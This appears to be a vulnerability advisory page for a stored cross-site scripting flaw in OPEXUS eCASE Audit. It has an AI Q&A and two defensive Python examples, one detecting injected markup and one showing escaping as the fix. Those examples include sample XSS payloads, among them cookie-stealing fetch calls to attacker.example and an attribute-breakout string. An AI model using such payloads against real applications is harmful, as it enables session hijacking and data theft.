CVE-2026-22232
Stored Cross-Site Scripting in OPEXUS eCASE Audit Project Setup
Publication date: 2026-01-08
Last updated on: 2026-02-05
Assigner: Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| opexus | ecase_audit | 11.14.2.0 |
| opexustech | ecase_audit | From 11.4.0 (inc) to 11.14.2.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a stored Cross-Site Scripting (XSS) issue in OPEXUS eCASE Audit. An authenticated attacker can insert malicious JavaScript code into the "A or SIC Number" field within the Project Setup functionality. This malicious script is then executed whenever another user views the affected project, potentially allowing unauthorized actions or data exposure. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability allows an authenticated attacker to inject and execute JavaScript code within the application, which could lead to unauthorized actions or data exposure. Such risks may impact compliance with standards like GDPR and HIPAA that require protection of sensitive data and prevention of unauthorized access. The fixed version includes sanitization and escaping of user inputs to prevent these stored XSS attacks, thereby helping to maintain compliance by protecting user sessions and sensitive data. [1]
How can this vulnerability impact me?
The vulnerability can lead to unauthorized execution of malicious scripts in the context of other users viewing the project. This can result in unauthorized actions, exposure of sensitive data, session hijacking, or other malicious activities that compromise user security and data integrity. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This is a stored Cross-Site Scripting (XSS) issue in the "A or SIC Number" field of the Project Setup functionality of OPEXUS eCASE Audit, so the injected payload persists in the application's data store and is reflected into the HTML of the project page served to every user who views it. Detection therefore means inspecting the stored values of that field, or the rendered project pages, for markup that has no business in an identifier: `<script` tags, `javascript:` URLs, inline event handlers such as `onerror=` or `onload=`, and HTML-entity-encoded variants of these. The resources do not provide specific commands, but typical approaches are querying the backing database column for such patterns, searching captured HTTP responses for project pages, and running a web application scanner against the field with a benign probe string. [1]
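The following is an added example, not code from the advisory or from OPEXUS: a small Python scan that applies the detection idea above to constructed sample rows standing in for the column behind the "A or SIC Number" field. The column and key names (`a_or_sic_number`, `project_id`), the expected identifier format, and the `attacker.example` host are assumptions; the real schema is not stated on this page. The scan checks both the raw value and its HTML-entity-decoded form, so encoded payloads are not missed, and it also flags values that simply do not look like an identifier.

```python
import html
import re

# Constructed sample rows standing in for the column that backs the
# "A or SIC Number" field. Column/key names are assumptions, not the product's schema.
SAMPLE_ROWS = [
    {"project_id": 101, "a_or_sic_number": "7372"},
    {"project_id": 102, "a_or_sic_number": "A-2024-0017"},
    {"project_id": 103, "a_or_sic_number": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"},
    {"project_id": 104, "a_or_sic_number": "<img src=x onerror=alert(document.domain)>"},
    {"project_id": 105, "a_or_sic_number": "&lt;svg onload=alert(1)&gt;"},
    {"project_id": 106, "a_or_sic_number": "javascript:alert(1)"},
]

# Heuristic indicators of injected markup. None of these belong in an identifier field.
INDICATORS = [
    ("script_tag", re.compile(r"<\s*/?\s*script", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_url", re.compile(r"javascript\s*:", re.I)),
    ("html_tag", re.compile(r"<\s*[a-z!/]", re.I)),
]

# Assumed shape of a legitimate value: letters, digits, dots and dashes.
# The real format is not given in the advisory; adjust to the deployment.
EXPECTED = re.compile(r"^[A-Za-z0-9.\-]{1,32}$")


def classify(value: str) -> list[str]:
    """Return the sorted indicator names matched by one stored field value.

    The value is checked as stored and after HTML-entity decoding, because a
    payload stored as &lt;svg ...&gt; still becomes <svg ...> once some code path
    decodes it before rendering.
    """
    candidates = {value, html.unescape(value)}
    hits = set()
    for candidate in candidates:
        for name, pattern in INDICATORS:
            if pattern.search(candidate):
                hits.add(name)
    # A value with no markup indicators that still fails the allowlist is worth a look.
    if not hits and not EXPECTED.fullmatch(value):
        hits.add("unexpected_format")
    return sorted(hits)


def find_suspicious(rows):
    """Return (project_id, indicators) for every row whose field value is suspicious."""
    findings = []
    for row in rows:
        hits = classify(row["a_or_sic_number"])
        if hits:
            findings.append((row["project_id"], hits))
    return findings


if __name__ == "__main__":
    for project_id, hits in find_suspicious(SAMPLE_ROWS):
        print(f"project {project_id}: {', '.join(hits)}")
```

`classify` takes any string, so the same function can be run over values pulled from a database export or over the cell text extracted from captured project-page responses; the `unexpected_format` bucket is a low-confidence signal that depends entirely on the assumed allowlist.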
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation is to upgrade OPEXUS eCASE Audit to version 11.14.2.0 or later, where the vendor fixed the issue by sanitizing and escaping user input in the affected fields so that stored values are rendered as text rather than as markup. Note that the affected-versions table on this page lists 11.14.2.0 itself within the vulnerable range, so confirm the exact fixed build against the vendor's release notes. Until the upgrade is applied, limit which authenticated users can edit Project Setup, review existing "A or SIC Number" values for injected markup, and monitor for script injection attempts against that field. [1]
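As an added example (not the vendor's code, whose implementation is not public on this page), the Python below shows the shape of the CWE-79 defect beside the fix the advisory describes: the same stored value rendered once by plain string concatenation and once after output encoding with `html.escape(..., quote=True)`, into the two places such a value typically lands on a project page (a table cell and the pre-filled edit form). The two payloads, the HTML fragments, the `aOrSicNumber` input name, the identifier format used for the write-path allowlist, and `attacker.example` are all constructed assumptions. A small `HTMLParser` subclass counts the tags and `on*` attributes a browser would execute, so the difference between the two renderings is measured rather than eyeballed.

```python
import html
import re
from html.parser import HTMLParser

# Two constructed payloads of the kind an authenticated user could save into the field.
# The first targets element-text context; the second breaks out of a quoted attribute.
TEXT_PAYLOAD = "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
ATTR_PAYLOAD = '" onfocus="alert(document.domain)" autofocus="'

# Assumed identifier shape (letters, digits, dots, dashes); the real format is not
# stated in the advisory, so treat this as a placeholder for the deployment's rule.
A_OR_SIC_FORMAT = re.compile(r"[A-Za-z0-9.\-]{1,32}")


def render_project_row(a_or_sic: str, encode: bool) -> str:
    """Render the stored value into a table cell and into the edit form's input.

    encode=False reproduces the CWE-79 defect: the value is concatenated into the
    page unchanged. encode=True is the fix: HTML-encode it for both the text and
    the quoted-attribute context (quote=True also escapes " and ').
    """
    value = html.escape(a_or_sic, quote=True) if encode else a_or_sic
    return (
        f"<tr><td>A or SIC Number</td><td>{value}</td></tr>\n"
        f'<input name="aOrSicNumber" value="{value}">'
    )


def is_identifier_shaped(a_or_sic: str) -> bool:
    """Write-path allowlist check, as defence in depth alongside output encoding."""
    return A_OR_SIC_FORMAT.fullmatch(a_or_sic) is not None


def validate_on_save(a_or_sic: str) -> str:
    """Refuse to store anything that is not identifier-shaped."""
    if not is_identifier_shaped(a_or_sic):
        raise ValueError("A or SIC Number must be 1-32 letters, digits, '.' or '-'")
    return a_or_sic


class ScriptSinkFinder(HTMLParser):
    """Records start tags and attributes that a browser would execute as script."""

    def __init__(self) -> None:
        super().__init__()
        self.sinks = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.sinks.append((tag, "script"))
        for name, _ in attrs:
            if name.startswith("on"):
                self.sinks.append((tag, name))


def executable_sinks(rendered_html: str):
    """Return (tag, attribute) pairs in the rendered HTML that would run script."""
    finder = ScriptSinkFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.sinks


if __name__ == "__main__":
    for payload in (TEXT_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", executable_sinks(render_project_row(payload, encode=False)))
        print("fixed:     ", executable_sinks(render_project_row(payload, encode=True)))
        print("allowed on save:", is_identifier_shaped(payload))
```

Encoding at output is the actual fix; the allowlist on save is an extra layer that would have rejected both payloads before they were stored, but it cannot be relied on alone because the field's legitimate format may change and values may reach the database by other paths.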